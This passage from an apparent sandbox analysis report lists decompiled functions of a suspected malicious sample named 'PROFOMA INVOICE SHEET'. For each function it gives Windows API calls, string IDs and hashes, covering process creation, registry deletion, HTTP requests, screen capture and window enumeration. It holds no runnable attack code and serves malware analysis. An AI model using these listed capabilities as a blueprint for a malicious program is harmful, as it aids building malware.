                                    • API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
                                    • String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                    • API String ID: 66158676-1714406822
                                    • Opcode ID: 4830ac6874d5c08645e953e42c89d9c3d3dc758d64b10e73e9aeba00f2a2137a
                                    • Instruction ID: 78ae1cce0065a6aecf6f2b9445f66b220cb898ad7aa70a6b3d91445c84ec4980
                                    • Opcode Fuzzy Hash: 4830ac6874d5c08645e953e42c89d9c3d3dc758d64b10e73e9aeba00f2a2137a
                                    • Instruction Fuzzy Hash: 03210B366457216FE71B6B74BC06BAE739CDB05F51F010137F805EA292DB71AC048A94
                                    APIs
                                    • CharLowerBuffW.USER32(00000000,00000000,0039CC08), ref: 00374527
                                    • _wcslen.LIBCMT ref: 0037453B
                                    • _wcslen.LIBCMT ref: 00374599
                                    • _wcslen.LIBCMT ref: 003745F4
                                    • _wcslen.LIBCMT ref: 0037463F
                                    • _wcslen.LIBCMT ref: 003746A7
                                      • Part of subcall function 0031F9F2: _wcslen.LIBCMT ref: 0031F9FD
                                    • GetDriveTypeW.KERNEL32(?,003C6BF0,00000061), ref: 00374743
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: _wcslen$BuffCharDriveLowerType
                                    • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                    • API String ID: 2055661098-1000479233
                                    • Opcode ID: 827fc2e10b70d714ff9e61daa916ef1b5805d40287e36b76e5d2495d8636ac97
                                    • Instruction ID: abb59fd501e1685f45c61b76e050a8be38affe1e42fbbb06b23974cef23988b9
                                    • Opcode Fuzzy Hash: 827fc2e10b70d714ff9e61daa916ef1b5805d40287e36b76e5d2495d8636ac97
                                    • Instruction Fuzzy Hash: D5B116316083029FC726DF28C891A6EB7E5BF96720F51891DF4AACB291D734EC44CB52
                                    APIs
                                      • Part of subcall function 00319BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00319BB2
                                    • DragQueryPoint.SHELL32(?,?), ref: 00399147
                                      • Part of subcall function 00397674: ClientToScreen.USER32(?,?), ref: 0039769A
                                      • Part of subcall function 00397674: GetWindowRect.USER32(?,?), ref: 00397710
                                      • Part of subcall function 00397674: PtInRect.USER32(?,?,00398B89), ref: 00397720
                                    • SendMessageW.USER32(?,000000B0,?,?), ref: 003991B0
                                    • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 003991BB
                                    • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 003991DE
                                    • SendMessageW.USER32(?,000000C2,00000001,?), ref: 00399225
                                    • SendMessageW.USER32(?,000000B0,?,?), ref: 0039923E
                                    • SendMessageW.USER32(?,000000B1,?,?), ref: 00399255
                                    • SendMessageW.USER32(?,000000B1,?,?), ref: 00399277
                                    • DragFinish.SHELL32(?), ref: 0039927E
                                    • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 00399371
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen
                                    • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID$p#=
                                    • API String ID: 221274066-673275980
                                    • Opcode ID: d8a05b13f3d33b80d8b736044c60cbd6b1eb7d84ba621380fcc47bcd71bccdb0
                                    • Instruction ID: 49314b8668127a88da0c4a3cda082e2c620a0a15d7e7a06874873559d23db3ce
                                    • Opcode Fuzzy Hash: d8a05b13f3d33b80d8b736044c60cbd6b1eb7d84ba621380fcc47bcd71bccdb0
                                    • Instruction Fuzzy Hash: F861AC72108301AFD702EF64DC95EAFBBE8EF89750F00091EF591971A1DB309A48CB62
                                    APIs
                                    • _wcslen.LIBCMT ref: 0038B198
                                    • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0038B1B0
                                    • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0038B1D4
                                    • _wcslen.LIBCMT ref: 0038B200
                                    • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0038B214
                                    • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0038B236
                                    • _wcslen.LIBCMT ref: 0038B332
                                      • Part of subcall function 003705A7: GetStdHandle.KERNEL32(000000F6), ref: 003705C6
                                    • _wcslen.LIBCMT ref: 0038B34B
                                    • _wcslen.LIBCMT ref: 0038B366
                                    • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0038B3B6
                                    • GetLastError.KERNEL32(00000000), ref: 0038B407
                                    • CloseHandle.KERNEL32(?), ref: 0038B439
                                    • CloseHandle.KERNEL32(00000000), ref: 0038B44A
                                    • CloseHandle.KERNEL32(00000000), ref: 0038B45C
                                    • CloseHandle.KERNEL32(00000000), ref: 0038B46E
                                    • CloseHandle.KERNEL32(?), ref: 0038B4E3
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: Handle$Close_wcslen$Directory$CurrentSystem$CreateErrorLastProcess
                                    • String ID:
                                    • API String ID: 2178637699-0
                                    • Opcode ID: a3f3dffe60fc9054f6881b29de71d7f5c5bd57437733f144fb083c3762a4ad3c
                                    • Instruction ID: 1b77b0adf61e4f834a1b94f1b05fa812b7f64031f617bdd7d2d3995ea04f8e40
                                    • Opcode Fuzzy Hash: a3f3dffe60fc9054f6881b29de71d7f5c5bd57437733f144fb083c3762a4ad3c
                                    • Instruction Fuzzy Hash: FCF19E715083019FCB16EF24C891B6EBBE5AF85314F19899DF4999F2A2CB31EC41CB52
                                    APIs
                                    • GetMenuItemCount.USER32(003D1990), ref: 00342F8D
                                    • GetMenuItemCount.USER32(003D1990), ref: 0034303D
                                    • GetCursorPos.USER32(?), ref: 00343081
                                    • SetForegroundWindow.USER32(00000000), ref: 0034308A
                                    • TrackPopupMenuEx.USER32(003D1990,00000000,?,00000000,00000000,00000000), ref: 0034309D
                                    • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 003430A9
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow
                                    • String ID: 0
                                    • API String ID: 36266755-4108050209
                                    • Opcode ID: 93a5790159a7872772ec0bfcabe2b4ee99c0510974ed62d0dfce037dd1146348
                                    • Instruction ID: 39326caf822522600cb41fe3553b6e311b57880e88b57001cee896cf72da61c6
                                    • Opcode Fuzzy Hash: 93a5790159a7872772ec0bfcabe2b4ee99c0510974ed62d0dfce037dd1146348
                                    • Instruction Fuzzy Hash: BA71F431645205BEEB238F65CC59FAABFACFF05324F204216F515AE1E0C7B2A954CB50
                                    APIs
                                    • DestroyWindow.USER32(?,?), ref: 00396DEB
                                      • Part of subcall function 00306B57: _wcslen.LIBCMT ref: 00306B6A
                                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00396E5F
                                    • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00396E81
                                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00396E94
                                    • DestroyWindow.USER32(?), ref: 00396EB5
                                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00300000,00000000), ref: 00396EE4
                                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00396EFD
                                    • GetDesktopWindow.USER32 ref: 00396F16
                                    • GetWindowRect.USER32(00000000), ref: 00396F1D
                                    • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00396F35
                                    • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00396F4D
                                      • Part of subcall function 00319944: GetWindowLongW.USER32(?,000000EB), ref: 00319952
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_wcslen
                                    • String ID: 0$tooltips_class32
                                    • API String ID: 2429346358-3619404913
                                    • Opcode ID: 17e015b4276540a93bb5533149c80432d8e7705f7430c36e2b2f2e5002812fab
                                    • Instruction ID: e3a498311d97f9a5092847082ee3c6159d39026cb151cb621a67a26793395618
                                    • Opcode Fuzzy Hash: 17e015b4276540a93bb5533149c80432d8e7705f7430c36e2b2f2e5002812fab
                                    • Instruction Fuzzy Hash: 21715874505244AFDB22CF18EC69FBABBE9FB89304F44041EF99A87261C771E906CB51
                                    APIs
                                    • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0037C4B0
                                    • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 0037C4C3
                                    • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 0037C4D7
                                    • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0037C4F0
                                    • InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 0037C533
                                    • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 0037C549
                                    • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0037C554
                                    • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0037C584
                                    • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 0037C5DC
                                    • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 0037C5F0
                                    • InternetCloseHandle.WININET(00000000), ref: 0037C5FB
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
                                    • String ID:
                                    • API String ID: 3800310941-3916222277
                                    • Opcode ID: d8f900aa760dff961f525a6c9fb0e9a6dd13469c5ef1ad7c2be053f2799b9cd9
                                    • Instruction ID: 49113ad6de594f552479e9be13c16746e100e32f621cb0c5f569727fb5aba31d
                                    • Opcode Fuzzy Hash: d8f900aa760dff961f525a6c9fb0e9a6dd13469c5ef1ad7c2be053f2799b9cd9
                                    • Instruction Fuzzy Hash: 3C514FB1510608BFDB328FA1C988AAB7BBCFF09754F00941EF94996510D73AE944DB60
                                    APIs
                                    • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,00000000,?), ref: 00398592
                                    • GetFileSize.KERNEL32(00000000,00000000), ref: 003985A2
                                    • GlobalAlloc.KERNEL32(00000002,00000000), ref: 003985AD
                                    • CloseHandle.KERNEL32(00000000), ref: 003985BA
                                    • GlobalLock.KERNEL32(00000000), ref: 003985C8
                                    • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 003985D7
                                    • GlobalUnlock.KERNEL32(00000000), ref: 003985E0
                                    • CloseHandle.KERNEL32(00000000), ref: 003985E7
                                    • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 003985F8
                                    • OleLoadPicture.OLEAUT32(?,00000000,00000000,0039FC38,?), ref: 00398611
                                    • GlobalFree.KERNEL32(00000000), ref: 00398621
                                    • GetObjectW.GDI32(?,00000018,000000FF), ref: 00398641
                                    • CopyImage.USER32(?,00000000,00000000,?,00002000), ref: 00398671
                                    • DeleteObject.GDI32(00000000), ref: 00398699
                                    • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 003986AF
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                    • String ID:
                                    • API String ID: 3840717409-0
                                    • Opcode ID: 5f3e8eb52625c7d2a620a88c46788eb5882b95afe186c2ce5df47ecfd92d51a9
                                    • Instruction ID: 04acf75746a4cbc8c137d7666688596b608a5a17b0896fda4809ee90d5889ae9
                                    • Opcode Fuzzy Hash: 5f3e8eb52625c7d2a620a88c46788eb5882b95afe186c2ce5df47ecfd92d51a9
                                    • Instruction Fuzzy Hash: 2A413A75600208AFDB12DFA5CC88EAA7BBCFF8A711F114459F905EB260DB319D05CB20
                                    APIs
                                    • VariantInit.OLEAUT32(00000000), ref: 00371502
                                    • VariantCopy.OLEAUT32(?,?), ref: 0037150B
                                    • VariantClear.OLEAUT32(?), ref: 00371517
                                    • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 003715FB
                                    • VarR8FromDec.OLEAUT32(?,?), ref: 00371657
                                    • VariantInit.OLEAUT32(?), ref: 00371708
                                    • SysFreeString.OLEAUT32(?), ref: 0037178C
                                    • VariantClear.OLEAUT32(?), ref: 003717D8
                                    • VariantClear.OLEAUT32(?), ref: 003717E7
                                    • VariantInit.OLEAUT32(00000000), ref: 00371823
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem
                                    • String ID: %4d%02d%02d%02d%02d%02d$Default
                                    • API String ID: 1234038744-3931177956
                                    • Opcode ID: 51bd0f4f6eb650c3e46383a5a838e97ef2f4ded8a23e747414b8d1ec999f0f15
                                    • Instruction ID: bd235da55b791da039c93c29c59eae0fe1cd43bf7ae8afffc66f340a5c610895
                                    • Opcode Fuzzy Hash: 51bd0f4f6eb650c3e46383a5a838e97ef2f4ded8a23e747414b8d1ec999f0f15
                                    • Instruction Fuzzy Hash: 17D10472A00105DBDF2A9F69D885BB9B7B9BF4A710F14C05AE40AAF580DB38DC41DB51
                                    APIs
                                      • Part of subcall function 00309CB3: _wcslen.LIBCMT ref: 00309CBD
                                      • Part of subcall function 0038C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0038B6AE,?,?), ref: 0038C9B5
                                      • Part of subcall function 0038C998: _wcslen.LIBCMT ref: 0038C9F1
                                      • Part of subcall function 0038C998: _wcslen.LIBCMT ref: 0038CA68
                                      • Part of subcall function 0038C998: _wcslen.LIBCMT ref: 0038CA9E
                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0038B6F4
                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0038B772
                                    • RegDeleteValueW.ADVAPI32(?,?), ref: 0038B80A
                                    • RegCloseKey.ADVAPI32(?), ref: 0038B87E
                                    • RegCloseKey.ADVAPI32(?), ref: 0038B89C
                                    • LoadLibraryA.KERNEL32(advapi32.dll), ref: 0038B8F2
                                    • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 0038B904
                                    • RegDeleteKeyW.ADVAPI32(?,?), ref: 0038B922
                                    • FreeLibrary.KERNEL32(00000000), ref: 0038B983
                                    • RegCloseKey.ADVAPI32(00000000), ref: 0038B994
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: _wcslen$Close$DeleteLibrary$AddressBuffCharConnectFreeLoadOpenProcRegistryUpperValue
                                    • String ID: RegDeleteKeyExW$advapi32.dll
                                    • API String ID: 146587525-4033151799
                                    • Opcode ID: 9f5674bad3acff08658601e58ce441e95539370159f705860caf8088a6ffce28
                                    • Instruction ID: 2e52d8f3adfe33ad2642a615c290d8bece86c2a15f4f7e8d2da3298cfc2e6238
                                    • Opcode Fuzzy Hash: 9f5674bad3acff08658601e58ce441e95539370159f705860caf8088a6ffce28
                                    • Instruction Fuzzy Hash: 38C17B34205342AFD712EF24C495F2ABBE5BF84318F15859CF59A8B2A2CB31ED45CB91
                                    APIs
                                    • GetDC.USER32(00000000), ref: 003825D8
                                    • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 003825E8
                                    • CreateCompatibleDC.GDI32(?), ref: 003825F4
                                    • SelectObject.GDI32(00000000,?), ref: 00382601
                                    • StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 0038266D
                                    • GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 003826AC
                                    • GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 003826D0
                                    • SelectObject.GDI32(?,?), ref: 003826D8
                                    • DeleteObject.GDI32(?), ref: 003826E1
                                    • DeleteDC.GDI32(?), ref: 003826E8
                                    • ReleaseDC.USER32(00000000,?), ref: 003826F3
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                    • String ID: (
                                    • API String ID: 2598888154-3887548279
                                    • Opcode ID: 6a520480ca2d12ee1b31e6bb9831db5617304610b33e60304edd18e8786c3d0c
                                    • Instruction ID: 6a2698b2bcc11f42632282d2b54b59152bca763bfb38f517cd86a2900b4f2e9f
                                    • Opcode Fuzzy Hash: 6a520480ca2d12ee1b31e6bb9831db5617304610b33e60304edd18e8786c3d0c
                                    • Instruction Fuzzy Hash: EB610375D00219EFCF05DFA4D884EAEBBB9FF48310F20856AE955A7250E771A941CF60
                                    APIs
                                    • ___free_lconv_mon.LIBCMT ref: 0033DAA1
                                      • Part of subcall function 0033D63C: _free.LIBCMT ref: 0033D659
                                      • Part of subcall function 0033D63C: _free.LIBCMT ref: 0033D66B
                                      • Part of subcall function 0033D63C: _free.LIBCMT ref: 0033D67D
                                      • Part of subcall function 0033D63C: _free.LIBCMT ref: 0033D68F
                                      • Part of subcall function 0033D63C: _free.LIBCMT ref: 0033D6A1
                                      • Part of subcall function 0033D63C: _free.LIBCMT ref: 0033D6B3
                                      • Part of subcall function 0033D63C: _free.LIBCMT ref: 0033D6C5
                                      • Part of subcall function 0033D63C: _free.LIBCMT ref: 0033D6D7
                                      • Part of subcall function 0033D63C: _free.LIBCMT ref: 0033D6E9
                                      • Part of subcall function 0033D63C: _free.LIBCMT ref: 0033D6FB
                                      • Part of subcall function 0033D63C: _free.LIBCMT ref: 0033D70D
                                      • Part of subcall function 0033D63C: _free.LIBCMT ref: 0033D71F
                                      • Part of subcall function 0033D63C: _free.LIBCMT ref: 0033D731
                                    • _free.LIBCMT ref: 0033DA96
                                      • Part of subcall function 003329C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0033D7D1,00000000,00000000,00000000,00000000,?,0033D7F8,00000000,00000007,00000000,?,0033DBF5,00000000), ref: 003329DE
                                      • Part of subcall function 003329C8: GetLastError.KERNEL32(00000000,?,0033D7D1,00000000,00000000,00000000,00000000,?,0033D7F8,00000000,00000007,00000000,?,0033DBF5,00000000,00000000), ref: 003329F0
                                    • _free.LIBCMT ref: 0033DAB8
                                    • _free.LIBCMT ref: 0033DACD
                                    • _free.LIBCMT ref: 0033DAD8
                                    • _free.LIBCMT ref: 0033DAFA
                                    • _free.LIBCMT ref: 0033DB0D
                                    • _free.LIBCMT ref: 0033DB1B
                                    • _free.LIBCMT ref: 0033DB26
                                    • _free.LIBCMT ref: 0033DB5E
                                    • _free.LIBCMT ref: 0033DB65
                                    • _free.LIBCMT ref: 0033DB82
                                    • _free.LIBCMT ref: 0033DB9A
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                    • String ID:
                                    • API String ID: 161543041-0
                                    • Opcode ID: e03c394a56c8d4b95fdd3fff21d489a41358c0d454e8bef3b4c900a6f479bf23
                                    • Instruction ID: e222e8fe3f041ad41d0897d0bb7342bbbefa32180e13541a3c95c5510ffcabc0
                                    • Opcode Fuzzy Hash: e03c394a56c8d4b95fdd3fff21d489a41358c0d454e8bef3b4c900a6f479bf23
                                    • Instruction Fuzzy Hash: D83138326047059FEB23AA39F885B5BB7E9FF01311F164469F459DB191DF31AC908B20
                                    APIs
                                    • GetClassNameW.USER32(?,?,00000100), ref: 0036369C
                                    • _wcslen.LIBCMT ref: 003636A7
                                    • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00363797
                                    • GetClassNameW.USER32(?,?,00000400), ref: 0036380C
                                    • GetDlgCtrlID.USER32(?), ref: 0036385D
                                    • GetWindowRect.USER32(?,?), ref: 00363882
                                    • GetParent.USER32(?), ref: 003638A0
                                    • ScreenToClient.USER32(00000000), ref: 003638A7
                                    • GetClassNameW.USER32(?,?,00000100), ref: 00363921
                                    • GetWindowTextW.USER32(?,?,00000400), ref: 0036395D
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout_wcslen
